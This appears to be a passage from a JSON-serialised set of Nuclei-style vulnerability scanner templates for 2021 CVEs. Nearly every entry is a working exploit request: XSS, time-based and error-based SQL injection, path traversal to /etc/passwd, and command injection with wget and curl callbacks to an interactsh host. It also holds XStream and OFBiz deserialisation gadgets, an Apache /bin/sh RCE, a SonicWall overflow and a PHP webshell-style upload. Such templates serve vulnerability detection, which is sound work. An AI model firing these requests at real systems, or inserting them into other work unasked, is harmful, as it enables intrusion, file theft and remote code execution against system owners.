href=\"/\">"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["type=\"hidden\" value=\"(.*?)\">"],"internal":true}]}]},{"id":"CVE-2021-26723","info":{"name":"Jenzabar 9.2x-9.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36260","info":{"name":"Hikvision IP camera/NVR - Remote Command Execution","severity":"critical"},"requests":[{"raw":["PUT /SDK/webLanguage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?><language>$(echo {{string}}>webLib/x)</language>\n","GET /x HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{string}}"]}]}]},{"id":"CVE-2021-32853","info":{"name":"Erxes <0.23.0 - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["topic_id: \"</script><script>alert(document.domain)</script>","window.erxesEnv"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39146","info":{"name":"XStream 1.4.18 - Arbitrary Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>test</type>\n    <value class='javax.swing.MultiUIDefaults' serialization='custom'>\n      <unserializable-parents/>\n      <hashtable>\n          <default>\n            <loadFactor>0.75</loadFactor>\n            <threshold>525</threshold>\n          </default>\n          <int>700</int>\n          <int>0</int>\n      </hashtable>\n      <javax.swing.UIDefaults>\n          <default>\n            <defaultLocale>zh_CN</defaultLocale>\n            <resourceCache/>\n          </default>\n      </javax.swing.UIDefaults>\n      <javax.swing.MultiUIDefaults>\n          <default>\n            <tables>\n            <javax.swing.UIDefaults serialization='custom'>\n              <unserializable-parents/>\n              <hashtable>\n                <default>\n                  <loadFactor>0.75</loadFactor>\n                  <threshold>525</threshold>\n                </default>\n                <int>700</int>\n                <int>1</int>\n                <string>lazyValue</string>\n                <javax.swing.UIDefaults_-ProxyLazyValue>\n                  <className>javax.naming.InitialContext</className>\n                  <methodName>doLookup</methodName>\n                  <args>\n                    <string>ldap://{{interactsh-url}}/#evil</string>\n                  </args>\n                </javax.swing.UIDefaults_-ProxyLazyValue>\n              </hashtable>\n              <javax.swing.UIDefaults>\n                <default>\n                  <defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>\n                  <resourceCache/>\n                </default>\n              </javax.swing.UIDefaults>\n            </javax.swing.UIDefaults>\n            </tables>\n          </default>\n      </javax.swing.MultiUIDefaults>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>test</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n      <m__obj class='string'>test</m__obj>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-24351","info":{"name":"WordPress The Plus Addons for Elementor <4.1.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=theplus_more_post&post_type=any&posts_per_page=10&offset=0&display_button=yes&post_load=products&animated_columns=test%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","the-plus-addons-for-elementor"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36873","info":{"name":"WordPress iQ Block Country <=1.2.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=iqblockcountry-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Diq-block-country%2Flibs%2Fblockcountry-settings.php&blockcountry_blockmessage=test</textarea><script>alert(document.domain)</script>&blockcountry_redirect=2&blockcountry_redirect_url=&blockcountry_header=on&blockcountry_nrstatistics=15&blockcountry_daysstatistics=30&blockcountry_geoapikey=&blockcountry_apikey=&blockcountry_ipoverride=NONE&blockcountry_debuglogging=on\n","GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, 'blockcountry_blockmessage\\\">test</textarea><script>alert(document.domain)</script>')","contains(body_4, '<h3>Block type</h3>')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2021-23241","info":{"name":"MERCUSYS Mercury X18G 1.0.5 Router - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/loginLess/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37416","info":{"name":"Zoho ManageEngine ADSelfService Plus <=6103 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["></iframe><script>alert(1)</script>","adsf/js/"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22145","info":{"name":"Elasticsearch 7.10.0-7.13.3 - Information Disclosure","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/_bulk"],"body":"@\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["root_cause","truncated","reason"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2021-24647","info":{"name":"Pie Register < 3.7.1.6 - Unauthenticated Arbitrary Login","severity":"high"},"requests":[{"raw":["GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{randstr}}&pwd={{randstr}}&social_site=true&user_id_social_site=1&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/profile.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_1, \"pieregister\")","contains(body_3, \"Username\") && contains(body_3, \"email-description\")"],"condition":"and"}]}]},{"id":"CVE-2021-24956","info":{"name":"Blog2Social < 6.8.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=blog2social&b2sShowByDate=\"><script>alert(document.domain)</script>  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>\" name=","Your Activity"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27520","info":{"name":"FUDForum 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x\"+onmouseover%3Dalert%28document.domain%29+x%3D","{{BaseURL}}/forum/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x\"+onmouseover%3Dalert%28document.domain%29+x%3D%22"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=alert(document.domain) x=","FUDforum"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46704","info":{"name":"GenieACS => 1.2.8 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/ping/;`id`"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["uid=([0-9]+)"]},{"type":"status","status":[500]}],"extractors":[{"type":"regex","regex":["uid=(\\d+)\\((\\w+)\\)"],"part":"body"}]}]},{"id":"CVE-2021-21801","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24214","info":{"name":"WordPress OpenID Connect Generic Client 3.8.0-3.8.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/daggerhart-openid-connect-generic/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["OpenID Connect Generic Client"]}]},{"method":"GET","path":["{{BaseURL}}/wp-login.php?login-error=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ERROR (<script>alert(document.domain)</script>):","Login with OpenID Connect"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39144","info":{"name":"XStream 1.4.18  - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n    </default>\n    <int>3</int>\n    <dynamic-proxy>\n      <interface>java.lang.Comparable</interface>\n      <handler class='sun.tracing.NullProvider'>\n        <active>true</active>\n        <providerType>java.lang.Comparable</providerType>\n        <probes>\n          <entry>\n            <method>\n              <class>java.lang.Comparable</class>\n              <name>compareTo</name>\n              <parameter-types>\n                <class>java.lang.Object</class>\n              </parameter-types>\n            </method>\n            <sun.tracing.dtrace.DTraceProbe>\n              <proxy class='java.lang.Runtime'/>\n              <implementing__method>\n                <class>java.lang.Runtime</class>\n                <name>exec</name>\n                <parameter-types>\n                  <class>java.lang.String</class>\n                </parameter-types>\n              </implementing__method>\n            </sun.tracing.dtrace.DTraceProbe>\n          </entry>\n        </probes>\n      </handler>\n    </dynamic-proxy>\n    <string>curl http://{{interactsh-url}}</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-42565","info":{"name":"myfactory FMS  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20038","info":{"name":"SonicWall SMA100 Stack - Buffer Overflow/Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};?{{repeat(\"A\", 518)}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"prefix_addr":["%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf"],"system_addr":["%08%b7%06%08","%64%b8%06%08"]},"attack":"clusterbomb","matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-28854","info":{"name":"VICIdial Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/agc/vicidial_mysqli_errors.txt"],"matchers-condition":"and","matchers":[{"type":"word","words":["text/plain"],"part":"header"},{"type":"status","status":[200]},{"type":"word","words":["vdc_db_query"],"part":"body"}]}]},{"id":"CVE-2021-27909","info":{"name":"Mautic <3.3.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/passwordreset?bundle=';alert(document.domain);var+ok='"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'';alert(document.domain);var ok='","mauticBasePath"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24436","info":{"name":"WordPress W3 Total Cache <2.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=w3tc_extensions&extension=\"%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, '><script>alert(document.domain)</script>&action=view')","contains(header_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2021-46069","info":{"name":"Vehicle Service Management System 1.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_mechanic HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&name=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&contact=asd1&email=asd1@asd.com&status=1\n","GET /admin/?page=mechanics HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-27320","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&lastname={{randstr}}&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-43831","info":{"name":"Gradio < 2.5.0 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/file/../../../../../../../../../../../../../../../../../..{{path}}"],"payloads":{"path":["/etc/passwd","/windows/win.ini"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24145","info":{"name":"WordPress Modern Events Calendar Lite <5.16.5 - Authenticated Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=MEC-ix&tab=MEC-import HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: multipart/form-data; boundary=---------------------------132370916641787807752589698875\n\n-----------------------------132370916641787807752589698875\nContent-Disposition: form-data; name=\"feed\"; filename=\"{{randstr}}.php\"\nContent-Type: text/csv\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n-----------------------------132370916641787807752589698875\nContent-Disposition: form-data; name=\"mec-ix-action\"\n\nimport-start-bookings\n-----------------------------132370916641787807752589698875--\n","GET /wp-content/uploads/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["{{md5(string)}}"]}]}]},{"id":"CVE-2021-1499","info":{"name":"Cisco HyperFlex HX Data Platform - Arbitrary File Upload","severity":"medium"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Encoding: gzip, deflate\nContent-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583\nOrigin: {{RootURL}}\nReferer: {{RootURL}}\n\n-----------------------------253855577425106594691130420583\nContent-Disposition: form-data; name=\"file\"; filename=\"../../../../../tmp/passwd9\"\nContent-Type: application/json\n\nMyPasswdNewData->/api/tomcat\n\n-----------------------------253855577425106594691130420583--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{\"result\":","\"filename:","/tmp/passwd9"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25078","info":{"name":"Affiliates Manager < 2.9.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /?wpam_id=1 HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-For: <img src onerror=alert(document.domain)>\n","GET /wp-admin/admin.php?page=wpam-clicktracking HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200 && status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"<img src onerror=alert(document.domain)>\")","contains(body_3, \"Affiliates Manager Click Tracking\")"],"condition":"and"}]}]},{"id":"CVE-2021-24288","info":{"name":"WordPress AcyMailing <7.5.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://interact.sh&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-26247","info":{"name":"Cacti - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42013","info":{"name":"Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\necho Content-Type: text/plain; echo; {{cmd}}\n\n"],"stop-at-first-match":true,"unsafe":true,"matchers-condition":"or","matchers":[{"type":"word","name":"RCE","words":["CVE-2021-42013"]},{"type":"regex","name":"LFI","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-25085","info":{"name":"WOOF WordPress plugin - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]=<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"additional_fields\":[\"<img src=x onerror=alert(document.domain)>\"]}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27132","info":{"name":"Sercomm VD625 Smart Modems - CRLF Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Disposition: attachment;filename=test.txt","Set-Cookie:CRLFInjection=Test","Location: interact.sh","X-XSS-Protection:0"],"condition":"and"},{"type":"status","part":"header","status":[404]}]}]},{"id":"CVE-2021-31537","info":{"name":"SIS Informatik REWE GO SP17 <7.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>confirm({{randstr}})</script>","SIS-REWE"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2021-43798","info":{"name":"Grafana v8.x - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd","{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini","{{BaseURL}}/public/plugins/alertlist/../../../../../conf/defaults.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","regex":["root:.*:0:([0-9]+):","\\/tmp\\/grafana\\.sock","\\[(fonts|extensions|Mail|files)\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24389","info":{"name":"WordPress FoodBakery <2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41174","info":{"name":"Grafana 8.0.0 <= v.8.2.2 - Angularjs Rendering Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","words":["Grafana","frontend_boot_js_done_time_seconds"],"condition":"and"},{"type":"regex","regex":["\"subTitle\":\"Grafana (v8\\.(?:(?:1|0)\\.[0-9]|2\\.[0-2]))"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"subTitle\":\"Grafana ([a-z0-9.]+)"]}]}]},{"id":"CVE-2021-25899","info":{"name":"Void Aural Rec Monitor 9.0.0.1 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nPOST /AurallRECMonitor/services/svc-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nparam1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))dummy)--+dummy&param2=test\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Contacte con el administrador\")"],"condition":"and"}]}]},{"id":"CVE-2021-33544","info":{"name":"Geutebruck - Remote Command Injection","severity":"high"},"requests":[{"raw":["GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-41460","info":{"name":"ECShop 4.1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /delete_cart_goods.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=1||(updatexml(1,concat(0x7e,(select%20md5({{num}}))),1))\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29200","info":{"name":"Apache OFBiz < 17.12.07 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/SOAPService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n  <soapenv:Header/>\n    <soapenv:Body>\n      <ser>\n        <map-HashMap>\n          <map-Entry>\n            <map-Key>\n              <cus-obj>{{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"hex\")}}</cus-obj>\n            </map-Key>\n            <map-Value>\n              <std-String value=\"STDSTRING\"/>\n            </map-Value>\n          </map-Entry>\n        </map-HashMap>\n     </ser>\n  </soapenv:Body>\n</soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["value=\"responseMessage\""]}]}]},{"id":"CVE-2021-41691","info":{"name":"openSIS Student Information System 8.0 SQL Injection","severity":"high"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nUSERNAME={{username}}&PASSWORD={{password}}&language=en&log=\n","POST /TransferredOutModal.php?modfunc=detail HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nstudent_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5\n"],"attack":"pitchfork","payloads":{"username":["student"],"password":["student@123"]},"matchers":[{"type":"dsl","dsl":["contains(body_2, \"<!-- SQL STATEMENT:\") && contains(body_2, \"SELECT COUNT(STUDENT_ID)\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2021-26710","info":{"name":"Redwood Report2Web 4.3.4.5 & 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41648","info":{"name":"PuneethReddyHC action.php SQL Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/action.php"],"body":"proId=1'&addToCart=1","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Warning: mysqli_num_rows() expects parameter 1 to be","xdebug-error 